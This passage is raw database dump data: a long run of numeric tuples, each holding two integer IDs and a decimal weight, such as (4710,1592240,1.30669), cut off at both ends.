,1592240,1.30669),(4710,1592241,1.4),(4710,1592242,0.42),(4710,1592243,1.16669),(4710,1592244,1.4),(4710,1592245,0.32669),(4710,1592246,1.09669),(4710,1592247,1.19),(4710,1592248,0.46669),(4710,1592249,1.21331),(4710,1592250,1.4),(4710,1592251,0.42),(4710,1592252,1.21331),(4710,1592253,1.4),(4710,1592254,0.23331),(4710,1592255,0.86331),(4710,1592256,1.12),(4710,1592257,0.46669),(4710,1592258,1.16669),(4710,1592259,1.30669),(4710,1592260,0.65338),(4710,1592261,0.95669),(4710,1592262,1.09669),(4710,1592263,0.93331),(4710,1592264,1.05),(4710,1592265,0.65338),(4710,1592266,0.98),(4710,1592267,1.09669),(4710,1592268,0.91),(4710,1592269,1.14331),(4710,1592270,0.84),(4710,1592271,2.24),(4710,1592272,1.16669),(4710,1592273,1.16669),(4917,1592274,0.46669),(4710,1592274,0.93338),(4710,1592275,1.14331),(4710,1592276,1.33),(4710,1592277,1.09669),(4710,1592278,1.33),(4710,1592279,1.21331),(4710,1592280,1.33),(4710,1592281,0.95669),(4710,1592282,1.02669),(4710,1592283,1.05),(4710,1592284,1.33),(4710,1592285,0.42),(4710,1592286,1.21331),(4710,1592287,1.4),(4710,1592288,0.98),(4710,1592289,0.28),(4710,1592290,0.88669),(4710,1592291,1.14331),(4710,1592292,0.18669),(4710,1592293,1.05),(4710,1592294,1.14331),(4710,1592295,0.51331),(4710,1592296,1.12),(4710,1592297,1.37669),(4710,1592298,0.46669),(4710,1592299,1.14331),(4710,1592300,1.4),(4721,1602940,0.86331),(4721,1602941,1.09669),(4721,1602942,1.00331),(4721,1602943,1.05),(4721,1602944,0.93331),(4721,1602945,1.07331),(4721,1602946,0.98),(4721,1602947,1.09669),(4721,1602948,0.86331),(4721,1602949,1.07331),(4721,1602956,1.07331),(4721,1602957,1.19),(4721,1602958,0.98),(4721,1602959,1.07331),(4721,1602960,0.88669),(4721,1602961,0.95669),(4721,1602962,0.69993),(4721,1602963,0.93331),(4721,1602964,0.98),(4721,1602965,0.95669),(4721,1602966,1.00331),(4721,1602967,1.00331),(4721,1602968,1.16669),(4721,1602969,0.23331),(4721,1602970,1.05),(4721,1602971,1.28331),(4721,1602972,0.23331),(4721,1602973,1.00331),(4721,1602974,1.23669),(4721,1602975,1.00331),(4721,1602976,1.07331),(4721,1603066,0.91),(4721,1603067,1.16669),(4721,1603068,1.00331),(4721,1603069,1.19),(4721,1603070,0.95669),(4721,1603071,1.05),(4721,1603072,0.93331),(4721,1603073,1.12),(4721,1603074,0.91),(4721,1603075,0.95669),(4721,1603076,0.88669),(4721,1603077,1.14331),(4721,1603078,0.91),(4721,1603079,1.09669),(4721,1603080,0.51331),(4721,1603081,1.05),(4721,1603082,1.19),(4721,1603083,0.51331),(4721,1603084,1.16669),(4721,1603085,1.23669),(4721,1603086,0.37331),(4721,1603087,0.95669),(4721,1603088,1.09669),(4721,1603089,0.14),(4917,1603089,0.14),(4734,1603089,0.56),(4721,1603090,0.86331),(4721,1603091,1.00331),(4721,1603092,0.98),(4721,1603093,1.12),(4721,1603094,0.7),(4721,1603095,1.21331),(4721,1603096,1.4),(4721,1603097,0.32669),(4721,1603098,1.05),(4721,1603099,1.12),(4721,1603100,0.42),(4721,1603101,1.16669),(4721,1603102,1.26),(4721,1603103,0.88669),(4721,1603104,1.02669),(4721,1603105,0.46669),(4721,1603106,1.02669),(4721,1603107,1.21331),(4721,1603108,0.32669),(4721,1603109,1.02669),(4721,1603110,1.14331),(4721,1603111,0.37331),(4721,1603112,0.95669),(4721,1603113,1.14331),(4721,1603114,0.42),(4721,1603115,0.95669),(4721,1603116,1.12),(4721,1603117,1.44),(4721,1603118,0.98),(4721,1603119,1.07331),(4721,1603120,2.55),(4721,1603121,3.17339),(4721,1603122,0.42),(4721,1603123,1.05),(4721,1603124,1.26),(4721,1603125,0.98),(4721,1603126,1.02669),(4721,1603127,1.00331),(4721,1603128,1.07331),(4721,1603129,0.60669),(4721,1603130,1.14331),(4721,1603131,1.19),(4721,1603132,1.19),(4721,1603133,0.18669),(4721,1603134,0.84),(4721,1603135,0.91),(4721,1603136,0.18669),(4734,1603136,0.56007),(4721,1603137,1.00331),(4721,1603138,1.07331),(4721,1603139,0.18669),(4721,1603140,0.84),(4721,1603141,0.98),(4721,1603142,0.32669),(4721,1603143,0.95669),(4721,1603144,1.14331),(4721,1603145,0.28),(4721,1603146,1.02669),(4721,1603147,1.19),(4721,1604017,0.37331),(4721,1604018,0.98),(4721,1604019,1.12),(4721,1604020,0.46662),(4721,1604021,0.86331),(4721,1604022,1.23669),(4721,1604023,0.98),(4721,1604024,1.12),(4721,1604025,0.23331),(4721,1604026,0.98),(4721,1604027,1.21331),(4721,1604028,0.32669),(4721,1604029,0.95669),(4721,1604030,1.12),(4721,1604031,0.37331),(4777,1604031,0.37331),(4721,1604032,1.02669),(4721,1604033,1.14331),(4721,1604034,0.32669),(4721,1604035,0.93331),(4721,1604036,1.19),(4727,1605076,2.55),(4727,1605077,3.11661),(4732,1613382,0.32669),(4732,1613383,0.91),(4732,1613384,1.07331),(4732,1613385,0.18669),(4732,1613386,1.12),(4732,1613387,1.19),(4732,1613388,0.37338),(4761,1613388,0.37338),(4732,1613389,1.02669),(4761,1613389,1.02669),(4732,1613390,1.07331),(4732,1613391,1.05),(4732,1613392,1.09669),(4732,1613393,0.7),(4732,1613394,1.14331),(4732,1613395,1.35331),(4732,1613409,0.93331),(4732,1613410,1.00331),(4732,1613411,1.02669),(4732,1613412,1.21331),(4732,1613413,0.28),(4761,1613413,0.28),(4762,1613413,0.28),(4732,1613414,1.09669),(4761,1613414,1.09669),(4732,1613415,1.14331),(4732,1613416,0.51331),(4732,1613417,1.16669),(4732,1613418,1.30669),(4762,1613419,0.42),(4732,1613419,0.84),(4732,1613420,1.23669),(4732,1613421,1.16669),(4732,1613422,1.21331),(4732,1613423,0.56),(4732,1613424,1.02669),(4732,1613425,1.26),(4732,1613426,0.32669),(4761,1613426,0.32669),(4732,1613427,1.19),(4732,1613428,1.23669),(4761,1613429,0.42),(4762,1613429,0.42),(4732,1613429,0.84),(4732,1613430,0.95669),(4732,1613431,1.14331),(4732,1613432,0.95669),(4732,1613433,1.16669),(4761,1613434,0.28),(4732,1613434,0.56),(4732,1613435,1.14331),(4732,1613436,1.19),(4732,1613437,1.09669),(4732,1613438,1.14331),(4762,1613439,0.46669),(4732,1613439,2.80014),(4761,1613439,2.80014),(4732,1613440,2.94),(4732,1613441,1.12),(4732,1613442,1.12),(4732,1613443,1.30669),(4732,1613444,0.98),(4732,1613445,1.16669),(4732,1613446,0.98),(4732,1613447,1.14331),(4732,1613448,0.98),(4732,1613449,1.19),(4761,1613450,1.02669),(4732,1613450,4.10676),(4732,1613451,1.07331),(4732,1613452,1.07331),(4732,1613453,1.07331),(4732,1613454,1.07331),(4761,1613455,0.60669),(4762,1613455,0.60669),(4732,1613455,1.21338),(4732,1613456,1.07331),(4732,1613457,1.33),(4732,1613458,1.07331),(4732,1613459,1.26),(4761,1613460,0.60669),(4732,1613460,1.82007),(4762,1613460,1.82007),(4732,1613461,1.07331),(4732,1613462,1.26),(4732,1613463,1.05),(4732,1613464,1.26),(4732,1613465,1.21331),(4732,1613466,1.35331),(4761,1613667,0.32669),(4732,1613667,0.65338),(4732,1613668,1.02669),(4761,1613668,1.02669),(4732,1613669,1.28331),(4761,1613669,1.28331),(4732,1613670,1.02669),(4732,1613671,1.28331),(4734,1615844,0.9334),(4734,1615845,3.2),(4734,1615846,4),(4734,1615915,0.98),(4734,1615916,0.88669),(4734,1615917,0.91),(4734,1615918,1.14331),(4734,1615919,0.79331),(4734,1615920,1.00331),(4734,1615921,0.86331),(4734,1615922,1.28331),(4734,1615923,0.91),(4734,1615924,1.02669),(4734,1615925,0.88669),(4734,1615926,0.93331),(4734,1615927,0.79331),(4734,1615928,0.98),(4734,1615929,0.98),(4734,1615930,1.23669),(4734,1615931,0.98),(4734,1615932,1.07331),(4734,1615933,0.93331),(4734,1615934,1.09669),(4734,1615935,0.88669),(4734,1615936,1.14331),(4734,1615937,0.88669),(4734,1615938,1.05),(4734,1615941,0.37331),(4734,1615942,1.07331),(4734,1615943,1.23669),(4734,1615944,0.88669),(4734,1615945,1.02669),(4734,1615946,0.95669),(4734,1615947,1.00331),(4734,1615948,0.46669),(4734,1615949,1.02669),(4734,1615950,1.14331),(4734,1615951,0.46669),(4734,1615952,0.98),(4734,1615953,1.14331),(4734,1615954,0.28),(4777,1615954,0.28),(4734,1615955,0.93331),(4734,1615956,1.16669),(4734,1615957,0.74662),(4734,1615958,1.09669),(4734,1615959,1.19),(4734,1615960,1.07331),(4734,1615961,1.30669),(4734,1615962,0.65331),(4734,1615963,1.16669),(4734,1615964,1.4),(4734,1615965,0.18669),(4940,1615965,0.18669),(4734,1615966,1.00331),(4734,1615967,1.19),(4734,1615968,0.23331),(4734,1615969,0.91),(4734,1615970,1.14331),(4734,1615971,1.12),(4734,1615972,1.33),(4734,1615973,0.23331),(4734,1615974,0.91),(4734,1615975,1.02669),(4734,1616081,0.91),(4734,1616082,0.95669),(4734,1616083,0.86331),(4734,1616084,0.98),(4734,1616085,0.91),(4734,1616086,1.02669),(4734,1616087,0.84),(4734,1616088,1.02669),(4734,1616089,1.00331),(4734,1616090,1.23669),(4734,1616091,0.81669),(4734,1616092,0.86331),(4734,1616093,0.91),(4734,1616094,1.02669),(4734,1616095,0.84),(4734,1616096,1.02669),(4734,1616097,0.91),(4734,1616098,1.14331),(4734,1616099,0.98),(4734,1616100,1.14331),(4734,1616101,1.86662),(4734,1616102,2.1),(4734,1616103,0.84),(4734,1616104,0.98),(4734,1616105,0.84),(4734,1616106,0.95669),(4734,1616107,0.84),(4734,1616108,0.91),(4734,1616109,0.88669),(4734,1616110,1.09669),(4734,1616111,0.84),(4734,1616112,0.93331),(4734,1616113,0.93331),(4734,1616114,1.12),(4734,1616115,0.93331),(4734,1616116,1.09669),(4734,1616117,0.37331),(4734,1616118,1.09669),(4734,1616119,1.37669),(4734,1616120,0.32669),(4734,1616121,0.93331),(4734,1616122,1.02669),(4734,1616123,0.28),(4734,1616124,0.88669),(4734,1616125,0.98),(4734,1616126,0.60669),(4734,1616127,1.05),(4734,1616128,1.33),(4734,1616129,1.53993),(4734,1616130,1.16669),(4734,1616131,1.35331),(4734,1616132,1.07331),(4734,1616133,1.28331),(4734,1616134,1.09669),(4734,1616135,1.21331),(4734,1616136,0.88669),(4734,1616137,1.16669),(4734,1616138,0.93331),(4734,1616139,1.05),(4734,1616140,1.05),(4734,1616141,1.16669),(4734,1616142,0.84),(4734,1616143,0.98),(4734,1616144,0.28),(4734,1616145,0.88669),(4734,1616146,1.00331),(4927,1616147,0.14),(4938,1616147,0.14),(4734,1616147,0.28),(4734,1616148,1.05),(4734,1616149,1.23669),(4734,1616150,1.00331),(4734,1616151,1.05),(4734,1616152,0.18669),(4734,1616153,0.93331),(4734,1616154,1.07331),(4734,1616155,0.14),(4927,1616155,0.14),(4734,1616156,0.93331),(4734,1616157,1.12),(4734,1616158,0.32669),(4734,1616159,1.12),(4734,1616160,1.30669),(4734,1616161,0.32669),(4734,1616162,1.00331),(4734,1616163,1.12),(4734,1616164,0.18669),(4734,1616165,0.93331),(4734,1616166,1.02669),(4734,1616167,1.02669),(4734,1616168,1.07331),(4734,1616169,0.23331),(4927,1616169,0.23331),(4734,1616170,0.37331),(4734,1616171,0.98),(4734,1616172,1.26),(4734,1616173,0.28),(4734,1616174,0.95669),(4734,1616175,1.09669),(4734,1616176,0.98),(4734,1616177,1.07331),(4734,1616178,0.91),(4734,1616179,1.09669),(4734,1616180,0.91),(4734,1616181,1.02669),(4734,1616182,0.28),(4734,1616183,1.05),(4734,1616184,1.35331),(4734,1616185,0.32669),(4734,1616186,1.14331),(4734,1616187,1.28331),(4734,1616188,0.28),(4734,1616189,0.98),(4734,1616190,1.05),(4734,1616191,0.28),(4734,1616192,0.88669),(4734,1616193,0.93331),(4734,1616194,0.37331),(4734,1616195,1.02669),(4734,1616196,1.09669),(4734,1616197,0.46669),(4734,1616198,1.09669),(4734,1616199,1.30669),(4734,1616200,0.84),(4734,1616201,1.02669),(4734,1616202,1.26),(4734,1616203,1.28331),(4734,1616204,1.4),(4734,1616205,0.46669),(4734,1616206,1.09669),(4734,1616207,1.26),(4734,1616208,0.46669),(4734,1616209,1.00331),(4734,1616210,1.33),(4734,1616211,0.46669),(4734,1616212,1.21331),(4734,1616213,1.4),(4734,1616214,0.51331),(4734,1616215,1.16669),(4734,1616216,1.23669),(4734,1616217,0.46662),(4734,1616218,0.91),(4734,1616219,1.05),(4734,1616220,0.95669),(4734,1616221,1.19),(4734,1616222,0.28),(4734,1616223,1.07331),(4734,1616224,1.26),(4734,1616225,0.32669),(4734,1616226,1.02669),(4734,1616227,1.12),(4734,1616228,0.37331),(4734,1616229,1.09669),(4734,1616230,1.19),(4734,1616231,0.28),(4734,1616232,1.09669),(4734,1616233,1.19),(4734,1616234,0.23331),(4734,1616235,0.91),(4734,1616236,0.95669),(4734,1616237,0.86331),(4734,1616238,0.98),(4734,1616239,0.84),(4734,1616240,1.00331),(4734,1616241,1.05),(4734,1616242,1.28331),(4734,1616243,1.00331),(4734,1616244,1.07331),(4734,1616245,0.37331),(4734,1616246,0.95669),(4734,1616247,1.07331),(4734,1616248,0.37331),(4734,1616249,0.95669),(4734,1616250,1.37669),(4734,1616251,0.23331),(4734,1616252,1.00331),(4734,1616253,1.05),(4734,1616254,0.88669),(4734,1616255,1.14331),(4734,1616256,0.93331),(4734,1616257,1.12),(4734,1616258,0.28),(4734,1616259,1.12),(4734,1616260,1.16669),(4734,1616261,0.93331),(4734,1616262,1.02669),(4734,1616263,0.28),(4734,1616264,1.00331),(4734,1616265,1.28331),(4734,1616266,0.32669),(4734,1616267,1.02669),(4734,1616268,1.28331),(4734,1617631,0.32669),(4734,1617632,1.09669),(4734,1617633,1.37669),(4734,1617634,0.37338),(4734,1617635,1.07331),(4734,1617636,1.21331),(4734,1617637,0.95669),(4734,1617638,1.00331),(4734,1617639,0.42),(4734,1617640,0.81669),(4734,1617641,0.91),(4734,1617642,0.91),(4734,1617643,1.02669),(4734,1617644,0.84),(4734,1617645,0.88669),(4735,1617903,0.6666),(4804,1617903,0.6666),(4735,1617904,2.5334),(4735,1617905,3.0666),(4735,1617906,1.4666),(4735,1617907,2.9334),(4735,1617908,3.1334),(4735,1617909,1.6),(4735,1617941,2.15339),(4735,1617942,2.38),(4735,1617943,0.79339),(4735,1617944,2.38),(4735,1617945,2.72),(4735,1617946,2.38),(4735,1617947,2.49339),(4735,1617948,0.79339),(4735,1617949,2.26661),(4735,1617950,2.60661),(4736,1618015,0.42),(4780,1618015,0.42),(4927,1618015,0.42),(4803,1618015,0.84),(4849,1618015,0.84),(4940,1618015,1.26),(4736,1618016,1.00331),(4780,1618016,1.00331),(4927,1618016,1.00331),(4803,1618016,2.00662),(4849,1618016,2.00662),(4940,1618016,3.00993),(4736,1618017,1.07331),(4780,1618017,1.07331),(4927,1618017,1.07331),(4803,1618017,2.14662),(4849,1618017,2.14662),(4940,1618017,3.21993),(4736,1618018,0.5334),(4803,1618018,0.5334),(4927,1618018,1.0668),(4736,1618019,2.4),(4736,1618020,3.0666),(4736,1618041,2.32339),(4736,1618042,2.60661),(4736,1618043,2.21),(4736,1618044,3.06),(4938,1618045,0.37331),(4736,1618045,0.90661),(4929,1618045,0.90661),(4736,1618046,2.77661),(4736,1618047,3.06),(4761,1620267,0.37331),(4762,1620267,0.37331),(4761,1620273,0.74662),(4762,1620273,0.74662),(4761,1620278,0.18669),(4762,1620278,0.18669),(4761,1620279,0.86331),(4762,1620279,0.86331),(4761,1620280,1.07331),(4762,1620280,1.07331),(4761,1620353,0.42),(4762,1620353,0.42),(4761,1620356,0.32669),(4762,1620356,0.65338),(4761,1620361,1.21331),(4762,1620361,1.21331),(4762,1620384,0.37331),(4761,1620384,0.74662),(4762,1620390,2.24028),(4761,1620390,5.78739),(4762,1620391,4.29324),(4761,1620391,7.51317),(4762,1620396,8.77352),(4761,1620396,16.4503),(4761,1620402,1.33),(4762,1620402,1.33),(4762,1620418,1.21338),(4761,1620418,4.85352),(4762,1620419,2.52),(4761,1620419,10.08),(4762,1620420,2.8),(4761,1620420,9.8),(4741,1621217,0.8),(4749,1621217,0.8),(4813,1621217,0.8),(4741,1621225,1.02669),(4741,1621226,1.07331),(4741,1621227,1.35331),(4741,1621240,0.37331),(4851,1621240,0.37331),(4852,1621240,0.37331),(4741,1621241,1.16669),(4741,1621242,1.4),(4749,1623509,0.91),(4851,1623509,0.91),(4749,1623510,1.05),(4851,1623510,1.05),(4749,1623511,1.00331),(4753,1623511,1.00331),(4851,1623511,1.00331),(4749,1623512,1.12),(4753,1623512,1.12),(4759,1623826,2.15339),(4761,1626322,1.14331),(4761,1626323,1.33),(4761,1626324,2.28662),(4761,1626325,2.66),(4761,1626326,1.28331),(4761,1626327,1.12),(4761,1626328,1.37669),(4761,1626329,0.65331),(4761,1626330,1.26),(4761,1626331,1.4),(4761,1626332,0.84),(4761,1626333,1.91338),(4761,1626334,1.23669),(4761,1626335,1.07331),(4761,1626336,0.42),(4761,1626337,1.16669),(4761,1626338,1.33),(4761,1626339,0.60669),(4761,1626340,1.16669),(4761,1626341,1.30669),(4761,1626430,0.86331),(4761,1626431,1.02669),(4761,1626432,1.16669),(4761,1626433,1.4),(4761,1626434,0.91),(4761,1626435,1.12),(4761,1626436,1.19),(4761,1626437,1.4),(4761,1626438,0.60669),(4761,1626439,1.16669),(4761,1626440,1.28331),(4761,1626441,1.19),(4761,1626442,1.26),(4761,1626443,0.51331),(4761,1626444,1.14331),(4761,1626445,1.21331),(4761,1626446,0.37331),(4761,1626447,1.21331),(4761,1626448,1.37669),(4761,1626449,1.35331),(4761,1626450,0.32669),(4761,1626451,1.16669),(4761,1626452,1.4),(4761,1626453,0.37331),(4761,1626454,1.09669),(4761,1626455,1.35331),(4761,1626456,1.07331),(4761,1626457,1.33),(4761,1626458,1.16669),(4761,1626459,1.35331),(4761,1626460,1.05),(4761,1626461,1.30669),(4761,1626462,7.14),(4761,1626463,8.26014),(4761,1626464,0.93331),(4761,1626465,1.16669),(4761,1626466,1.07331),(4761,1626467,0.93338),(4761,1626468,2.24),(4761,1626469,2.75338),(4761,1626470,2.28662),(4761,1626471,2.38),(4761,1626472,1.4),(4761,1626473,1.33),(4761,1626474,1.35331),(4761,1626475,1.33),(4761,1626476,1.35331),(4761,1626477,1.30669),(4761,1626478,1.16669),(4761,1626479,2.33338),(4761,1626480,1.30669),(4761,1626481,1.4),(4761,1626482,1.16669),(4761,1626483,1.33),(4761,1626484,1.37669),(4761,1626485,1.19),(4761,1626486,1.33),(4761,1626487,3.57),(4761,1626488,1.28331),(4761,1626489,1.28331),(4761,1626490,8.19),(4761,1626491,10.5002),(4761,1626492,0.28),(4761,1626493,1.00331),(4761,1626494,1.23669),(4761,1626495,1.26),(4761,1626496,1.4),(4761,1626497,1.26),(4761,1626498,1.4),(4761,1626499,1.4),(4761,1626500,0.37331),(4761,1626501,1.16669),(4761,1626502,1.4),(4762,1628076,0.86331),(4762,1628077,1.12),(4762,1628078,0.95669),(4762,1628079,1.26),(4762,1628080,1.12),(4762,1628081,1.28331),(4762,1628082,0.32669),(4762,1628083,1.09669),(4762,1628084,1.26),(4762,1628085,1.12),(4762,1628086,1.28331),(4762,1628087,1.21331),(4762,1628088,1.4),(4762,1628089,0.32669),(4762,1628090,0.91),(4762,1628091,1.09669),(4762,1628092,0.23331),(4762,1628093,1.07331),(4762,1628094,1.30669),(4762,1628153,1.12),(4762,1628154,1.35331),(4762,1628155,1.09669),(4762,1628156,1.14331),(4762,1628157,1.00331),(4762,1628158,1.26),(4762,1628159,1.16669),(4762,1628160,1.4),(4762,1628161,0.18669),(4762,1628162,1.09669),(4762,1628163,1.33),(4762,1628164,0.56),(4762,1628165,1.21331),(4762,1628166,1.37669),(4762,1628167,1.14331),(4762,1628168,1.37669),(4762,1628169,1.14331),(4762,1628170,1.30669),(4762,1628171,1.16669),(4762,1628172,1.33),(4762,1628173,0.37331),(4762,1628174,1.00331),(4762,1628175,1.19),(4762,1628176,0.84),(4762,1628177,1.14331),(4762,1628178,1.23669),(4762,1628179,1.05),(4762,1628180,1.30669),(4762,1628181,1.12),(4762,1628182,1.21331),(4762,1628183,0.46669),(4762,1628184,1.07331),(4762,1628185,1.33),(4762,1628186,1.26),(4762,1628187,1.4),(4762,1628188,1.19),(4762,1628189,1.33),(4762,1628190,1.30669),(4762,1628191,1.35331),(4762,1628192,1.16669),(4762,1628193,1.37669),(4762,1628194,1.19),(4762,1628195,1.35331),(4762,1628196,1.35331),(4762,1628197,0.37331),(4762,1628198,1.14331),(4762,1628199,1.23669),(4762,1628200,0.46669),(4762,1628201,1.02669),(4762,1628202,1.23669),(4762,1628203,0.42),(4762,1628204,1.12),(4762,1628205,1.35331),(4762,1628206,1.23669),(4762,1628207,1.4),(4762,1628208,3.71007),(4762,1628209,4.2),(4762,1628210,0.32669),(4762,1628211,1.00331),(4762,1628212,1.26),(4762,1628669,0.37331),(4762,1628670,1.05),(4762,1628671,1.33),(4764,1629046,1.02),(4764,1629047,2.77661),(4764,1629048,3.06),(4940,1629049,0.14),(4849,1629049,0.28),(4764,1629049,0.34),(4806,1629049,0.34),(4764,1629050,2.43661),(4764,1629051,3.00339),(4767,1629131,0.9334),(4767,1629132,2.8),(4773,1629281,2.15339),(4773,1629282,2.43661),(4777,1629376,0.93331),(4777,1629377,1.14331),(4777,1629378,1.00331),(4777,1629379,1.14331),(4777,1629380,0.86331),(4777,1629381,1.07331),(4777,1629382,0.88669),(4777,1629383,1.09669),(4777,1629386,0.95669),(4777,1629387,1.09669),(4777,1629388,1.07331),(4777,1629389,1.26),(4777,1629390,0.23331),(4777,1629391,1.00331),(4777,1629392,1.16669),(4777,1629393,0.18669),(4777,1629394,0.98),(4777,1629395,1.21331),(4777,1629396,0.69993),(4777,1629397,2.94),(4777,1629398,1.26),(4777,1629399,1.07331),(4777,1629400,1.02669),(4777,1629428,0.93331),(4777,1629429,1.07331),(4777,1629430,0.74662),(4777,1629431,2.19338),(4777,1629432,1.30669),(4777,1629433,1.23669),(4777,1629434,0.32669),(4777,1629435,1.00331),(4777,1629436,1.26),(4777,1629437,0.51331),(4777,1629438,1.05),(4777,1629439,1.12),(4777,1629440,0.51331),(4777,1629441,1.09669),(4777,1629442,1.28331),(4777,1629443,1.02669),(4777,1629773,0.23331),(4777,1629774,0.98),(4777,1629775,1.21331),(4777,1629776,0.84),(4777,1629777,1.12),(4777,1629778,1.26),(4777,1629779,0.93331),(4777,1629780,1.09669),(4777,1629781,0.88669),(4777,1629782,1.05),(4777,1629783,0.51331),(4777,1629784,1.07331),(4777,1629785,1.26),(4777,1629786,1.00331),(4777,1629787,1.07331),(4777,1629788,0.65331),(4777,1629789,1.16669),(4777,1629790,1.21331),(4777,1629791,0.32669),(4777,1629792,1.09669),(4777,1629793,1.19),(4780,1629940,0.4),(4849,1629940,0.8),(4780,1629941,2.3334),(4780,1629942,2.8),(4780,1629956,2.09661),(4780,1629957,2.38),(4798,1643198,0.77),(4798,1643199,0.98),(4798,1643200,0.81669),(4798,1643201,0.98),(4798,1643202,1.35331),(4798,1643203,1.4),(4798,1643204,4.2),(4798,1643205,0.88669),(4798,1643206,0.88669),(4798,1643207,0.91),(4798,1643208,2.14662),(4798,1643209,0.88669),(4798,1643210,1.12),(4798,1643211,0.91),(4798,1643212,1.02669),(4798,1643213,0.98),(4798,1643214,1.09669),(4798,1643215,0.98),(4798,1643216,1.02669),(4798,1643217,1.05),(4798,1643218,1.19),(4798,1643219,1.72662),(4798,1643220,1.07331),(4798,1643221,1.07331),(4798,1643222,0.81669),(4798,1643223,0.88669),(4798,1643224,3.64),(4798,1643225,1.00331),(4798,1643226,1.09669),(4798,1643227,1.91338),(4798,1643228,0.81669),(4798,1643229,0.88669),(4798,1643230,0.37331),(4798,1643231,1.21331),(4798,1643232,1.26),(4798,1643233,0.37331),(4798,1643234,1.09669),(4798,1643235,1.4),(4798,1643236,0.37331),(4798,1643237,0.93331),(4798,1643238,1.26),(4798,1643239,0.32669),(4798,1643240,1.07331),(4798,1643241,1.4),(4798,1643242,0.51331),(4798,1643243,1.19),(4798,1643244,1.23669),(4798,1643245,0.7),(4798,1643246,1.33),(4798,1643247,1.4),(4798,1643248,0.60669),(4798,1643249,1.05),(4798,1643250,1.30669),(4798,1643251,0.42),(4798,1643252,0.95669),(4798,1643253,1.21331),(4798,1643254,1.21338),(4798,1643255,1.05),(4798,1643256,1.23669),(4798,1643257,1.14331),(4798,1643258,1.35331),(4798,1643259,0.51331),(4798,1643260,1.00331),(4798,1643261,1.19),(4798,1643262,0.37331),(4798,1643796,0.18669),(4798,1643797,1.07331),(4798,1643798,1.16669),(4803,1644911,0.8),(4803,1644912,2.9334),(4803,1644913,3.2),(4803,1644914,2.4),(4803,1644915,2.8666),(4803,1644916,0.9334),(4803,1644917,2.7334),(4803,1644918,3.2666),(4803,1644943,0.81669),(4803,1644944,1.00331),(4803,1644945,2.21),(4803,1644946,2.49339),(4803,1644947,0.88669),(4803,1644948,0.95669),(4803,1644949,1.00331),(4803,1644950,1.14331),(4803,1644951,0.46669),(4803,1644952,1.00331),(4803,1644953,1.19),(4803,1644964,0.56),(4849,1644964,0.56),(4927,1644964,0.56),(4803,1644965,1.19),(4803,1644966,1.35331),(4803,1644967,0.46669),(4803,1644968,1.07331),(4803,1644969,1.19),(4803,1644970,0.95669),(4803,1644971,1.19),(4803,1645124,0.18669),(4803,1645125,0.98),(4803,1645126,1.16669),(4804,1645166,2.6666),(4804,1645175,2.09661),(4804,1645176,2.38),(4804,1645177,0.79339),(4804,1645178,2.43661),(4804,1645179,2.55),(4806,1645263,0.8),(4806,1645264,2.9334),(4806,1645265,3.2666),(4806,1645280,1.98339),(4806,1645281,2.43661),(4806,1645282,0.68),(4806,1645283,2.26661),(4806,1645284,2.38),(4808,1645352,0.6666),(4809,1645394,2.21),(4809,1645395,2.55),(4809,1645396,0.56661),(4809,1645397,2.32339),(4809,1645398,2.49339),(4813,1645511,3),(4813,1645512,3.4),(4813,1645520,2.15339),(4813,1645521,2.60661),(4814,1645599,0.68),(4814,1645600,2.21),(4814,1645601,2.66339),(4839,1646574,5.3332),(4839,1646584,1.21331),(4847,1646584,1.21331),(4857,1646584,1.21331),(4849,1646938,5.0668),(4849,1646939,6.6668),(4849,1646977,0.79331),(4917,1646977,0.79331),(4849,1646978,1.05),(4849,1646979,0.93331),(4849,1646980,1.14331),(4849,1646981,0.93331),(4849,1646982,1.21331),(4849,1647008,0.86331),(4849,1647009,1.09669),(4849,1647010,0.86331),(4849,1647011,0.93331),(4849,1647012,0.88669),(4849,1647013,1.12),(4849,1647014,0.93331),(4849,1647015,0.98),(4849,1647016,0.88669),(4849,1647017,1.02669),(4849,1647018,0.88669),(4849,1647019,0.98),(4849,1647020,1.09669),(4849,1647021,1.16669),(4849,1647022,1.00331),(4849,1647023,1.23669),(4849,1647024,0.81669),(4849,1647025,0.95669),(4849,1647026,0.91),(4849,1647027,0.98),(4849,1647028,0.32669),(4849,1647029,1.12),(4849,1647030,1.33),(4849,1647031,0.32669),(4849,1647032,1.12),(4849,1647033,1.30669),(4849,1647034,1.24661),(4849,1647035,2.60661),(4849,1647036,0.18669),(4849,1647037,0.98),(4849,1647038,1.09669),(4849,1647039,0.42),(4849,1647040,1.19),(4849,1647041,1.4),(4849,1647398,0.23331),(4849,1647399,0.86331),(4849,1647400,1.07331),(4851,1647971,1.6),(4851,1647972,6.1332),(4851,1647973,7.3332),(4851,1647985,1.21331),(4852,1647985,1.21331),(4851,1648011,1.00331),(4852,1648011,1.00331),(4851,1648012,1.09669),(4852,1648071,1.09669),(4909,1672240,0.77),(4909,1672241,0.81669),(4909,1672242,0.91),(4909,1672243,1.05),(4909,1672244,0.51331),(4909,1672245,1.00331),(4909,1672246,1.12),(4909,1672247,0.51331),(4909,1672248,1.16669),(4909,1672249,1.28331),(4917,1678871,0.95669),(4917,1678872,1.09669),(4917,1678873,1.00331),(4917,1678874,0.91),(4917,1678875,1.12),(4917,1678876,1.07331),(4917,1678877,1.26),(4917,1678878,0.56),(4917,1678879,1.19),(4917,1678880,1.35331),(4917,1678881,0.56),(4917,1678882,1.14331),(4917,1678883,1.28331),(4917,1678884,0.56),(4917,1678885,1.05),(4917,1678886,1.23669),(4917,1678887,1.00331),(4917,1678888,0.98),(4917,1678889,1.05),(4917,1678890,1.00331),(4917,1678891,1.16669),(4917,1678914,0.98),(4917,1678915,1.14331),(4917,1678916,1.12),(4917,1678917,0.98),(4917,1678918,1.12),(4917,1678919,0.95669),(4917,1678920,1.23669),(4938,1678921,0.28),(4917,1678921,0.68),(4917,1678922,2.72),(4917,1678923,3.4),(4917,1678924,0.56),(4938,1678924,0.56),(4917,1678925,1.09669),(4917,1678926,1.19),(4917,1678927,0.60669),(4917,1678928,1.07331),(4917,1678929,1.35331),(4917,1678930,0.65331),(4917,1678931,1.21331),(4917,1678932,1.35331),(4917,1678933,1.16669),(4917,1678934,1.23669),(4917,1678935,0.93331),(4917,1678936,1.14331),(4917,1678937,0.32669),(4917,1678938,1.00331),(4917,1678939,1.19),(4917,1678940,1.68),(4938,1678940,1.68),(4917,1678941,3.15),(4917,1678942,1.26),(4917,1678943,1.16669),(4917,1678944,1.26),(4917,1678945,0.32669),(4917,1678946,0.95669),(4917,1678947,1.26),(4917,1678948,0.56),(4917,1678949,1.19),(4917,1678950,1.23669),(4917,1678951,0.37331),(4917,1678952,0.95669),(4917,1678953,1.19),(4917,1678954,0.606